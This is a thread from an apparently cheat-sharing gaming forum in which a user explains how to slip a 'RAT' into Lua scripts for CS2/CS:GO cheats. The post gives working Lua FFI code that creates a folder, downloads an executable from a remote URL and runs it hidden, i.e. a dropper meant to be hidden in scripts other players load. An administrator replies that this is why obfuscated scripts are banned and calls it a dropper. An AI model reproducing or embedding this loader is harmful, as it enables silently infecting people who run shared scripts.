What's new

Welcome to HvH Forum!

SignUp Now! Download Free HvH CS2/CS:GO Cheats, CFG, LUA/JS Scripts, And More!


SignUp Now!

Source Code Exploit How to insert a RAT into a LUA Script

An0mXD

An0mXD

TorDB.xyz Owner & Developer
User ID
79083
Messages
6
Reactions
5
Level
1
I think everyone knows about this but i will still share it here. this is how you Insert a RAT insto a lua script for any csgo/cs2 cheat.

You can create a Lua RAT for every cheat what has Lua API or the API allows shell ext.

Code: 
ffi.cdef[[

    typedef int(__thiscall* get_clipboard_text_count)(void*);

    typedef void(__thiscall* set_clipboard_text)(void*, const char*, int);

    typedef void(__thiscall* get_clipboard_text)(void*, int, const char*, int);

    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

    bool DeleteUrlCacheEntryA(const char* lpszUrlName);



    typedef int(__fastcall* clantag_t)(const char*, const char*);



    bool CreateDirectoryA(const char* lpPathName, void* lpSecurityAttributes);

    void* __stdcall URLDownloadToFileA(void* LPUNKNOWN, const char* LPCSTR, const char* LPCSTR2, int a, int LPBINDSTATUSCALLBACK);

    void* __stdcall ShellExecuteA(void* hwnd, const char* op, const char* file, const char* params, const char* dir, int show_cmd);

  

    int MessageBoxA(void *w, const char *txt, const char *cap, int type);



    int ShellExecuteA(void* hwnd, const char* lpOperation, const char* lpFile, const char* lpParameters, const char* lpDirectory, int nShowCmd);

]]

local Shell32 = ffi.load 'Shell32.dll'

local urlmon = ffi.load 'UrlMon'

local wininet = ffi.load 'WinInet'

ffi.C.CreateDirectoryA("C:\\ratted", nil)

wininet.DeleteUrlCacheEntryA("https://github.com/username/repository/raw/main/rat.exe")

urlmon.URLDownloadToFileA(nil, "https://github.com/username/repository/raw/main/rat.exe", "C:\\ratted\\rat.exe", 0,0)

Shell32.ShellExecuteA(nil, 'open', "C:\\ratted\\rat.exe", nil, nil, 0)

ffi.C.MessageBoxA(nil, "RATTED!!", "RATTED", 0x00004000)
 
Last edited by a moderator:
Plisskien

Plisskien

I'm not Plisskien
Administrator
User ID
1
Messages
1,249
Reactions
3,785
Level
99
Good example, this is why we have this rule
hackvshack.net

Rules

A list of rules users must stick to.
hackvshack.net hackvshack.net
where any script obfuscation is banned

Also I would rather call it dropper/downloader than RAT, because RAT is remote access trojan, thread name is misleading
 

Create an account or login to comment

You must be a member in order to leave a comment

Create account

Create an account on our community. It's easy!

Register

Log in

Already have an account? Log in here.

Newest members

Useful links

Forum statistics

Threads
2,412
Messages
19,828
Members
88,972
Latest member
aimarparm255
Most visitors online was 3164 , on 18 Jun 2023

Online statistics

Members online
57
Guests online
251
Total visitors
308
Totals may include hidden visitors.
Top